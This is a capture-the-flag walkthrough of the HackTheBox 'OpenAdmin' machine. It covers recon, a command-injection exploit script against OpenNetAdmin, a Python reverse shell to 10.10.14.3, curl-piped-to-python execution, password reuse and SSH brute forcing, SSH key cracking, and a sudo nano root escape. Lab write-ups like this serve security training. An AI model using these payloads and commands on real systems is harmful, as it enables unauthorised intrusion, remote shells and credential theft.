OpenAdmin
An easy Linux box from HackTheBox, using an exposed admin panel for initial access, then pivoting around between users, until getting root with an SUID binary.
Open Admin
Recon
Starting with nmap
nmap -sV -sC -oA initial 10.10.10.171
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Also running an allports scan with -p- option in the background as I worked on the box, but nothing new was shown
Searching for Apache 2.4.29 on launchpad, find that the box is relatively new, Ubuntu Bionic
Navigating to the HTTP server on port 80, all that it shows is the default Apache page
Welp, lets hit it with gobuster
gobuster dir -u 10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Find a few interesting directories, /music, /artwork and /sierra
Of these three, /music has a login button, that immediately dumps you into an administrator panel called OpenNetAdmin
Exploitation
For this particular version, there is a command injection exploit abusing the systems ping functionality
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
The above script (when executed and providing the URL, and the command you want to inject), will execute it on the server
Starting up a netcat session on port 1234, the payload will be a reverse shell
Copying the exploit into ona_inject.sh, but append a -x \http://127.0.0.1:8080 to the curl call to send the exploit’s curl to Burp Proxy (just to make sure its working)
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl -x 'http://127.0.0.1:8080' --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[
]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2
| head -n -1
done
And run it like so
./ona_inject.sh 10.10.10.171/ona/
Really weird box, hard to get reverse shell on it
Need to use this python reverse shell (minus the python -c at the front), saved into a file (called rev.py)
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Curl it from the server using a simple HTTP server, and then pipe it into python3 serverside
curl 10.10.14.3:8000/rev.py | python3
Run linPEAS.sh by wget’ing it from a simple HTTP server, don’t really find anything besides 2 user names, jimmy and joanne
Looking at the config files in the /opt/ona/www/ directory recursively with grep -R, find a file called database_settings.inc.php which leaks the mySQL user and password
'db_login' => ona_sys
'db_passwd' => n1nj4W4rri0R!
And login to the mySQL instance
mysql -u ona_sys -p
Running show databases
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| ona_default |
+--------------------+
2 rows in set (0.00 sec)
Navigating into ona_default
use ona_default;
show tables;
There is a user table, when running “describe users;”
+----------+------------------+------+-----+-------------------+-----------------------------+
| Field | Type | Null | Key | Default | Extra |
+----------+------------------+------+-----+-------------------+-----------------------------+
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
| username | varchar(32) | NO | UNI | NULL | |
| password | varchar(64) | NO | | NULL | |
| level | int(4) | NO | | 0 | |
| ctime | timestamp | NO | | CURRENT_TIMESTAMP | on update CURRENT_TIMESTAMP |
| atime | datetime | YES | | NULL | |
+----------+------------------+------+-----+-------------------+-----------------------------+
Then printing the user info with “select id,username,password from users;”
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | guest | 098f6bcd4621d373cade4e832627b4f6 |
| 2 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
Running the hashes into hash.org, get the creds
guest:test admin:admin
But these are just creds for the OpenNetAdmin instance
Lets try and combine all the passwords we have into a list and try each password on each of the known users
Passwords: admin test n1nj4W4rri0R!
Users: jimmy joanna root
Using a tool called medusa, lets try to ssh into the box as each user
medusa -h 10.10.10.171 -U users.txt -P pass.txt -M ssh 10.10.10.171
We get in as jimmy!
jimmy:n1nj4W4rri0R! is his creds
Looking into the (previously locked to us) home directory its empty, bummer
Lets try finding all the files owned by jimmy with
find / -user jimmy 2>/dev/null
Find some curious php scripts, one called main.php in /var/www/internal/
Cat’ing it, find that it just grabs the ssh key of joanna
Maybe there is another webserver running?
ln -lntp
Find there is a process listening on port 52846 only accepting queries from localhost
So to see joanna’s ssh key, need to run the php script with curl from jimmy
curl 127.0.0.1:52846/main.php
And it prints the ssh key out - unfortunately, there is a passphrase required for the key when you try to ssh into the box as joanna
Gotta crack it with john
#now, we will create a hash using it
python ssh2john.py joanna_id_rsa > joanna_id_rsa.hash
Finally, let’s use john and rockyou.txt to try and crack the SSH Key.
john joanna_id_rsa.hash -wordlist=rockyou.txt
The passphrase is “bloodninjas”
Now can ssh in as joanna, and find the user flag
Running sudo -l, find that joanna can run /bin/nano and have full priveleges to /opt/priv without a password
Looking at GTFObins, can get a shell through nano, by editing the only file that you can run sudo on /opt/priv
sudo /bin/nano /opt/priv
Then using the GTFObins instructions in nano
nano
^R^X
reset; sh 1>&0 2>&0
ANd you’re root!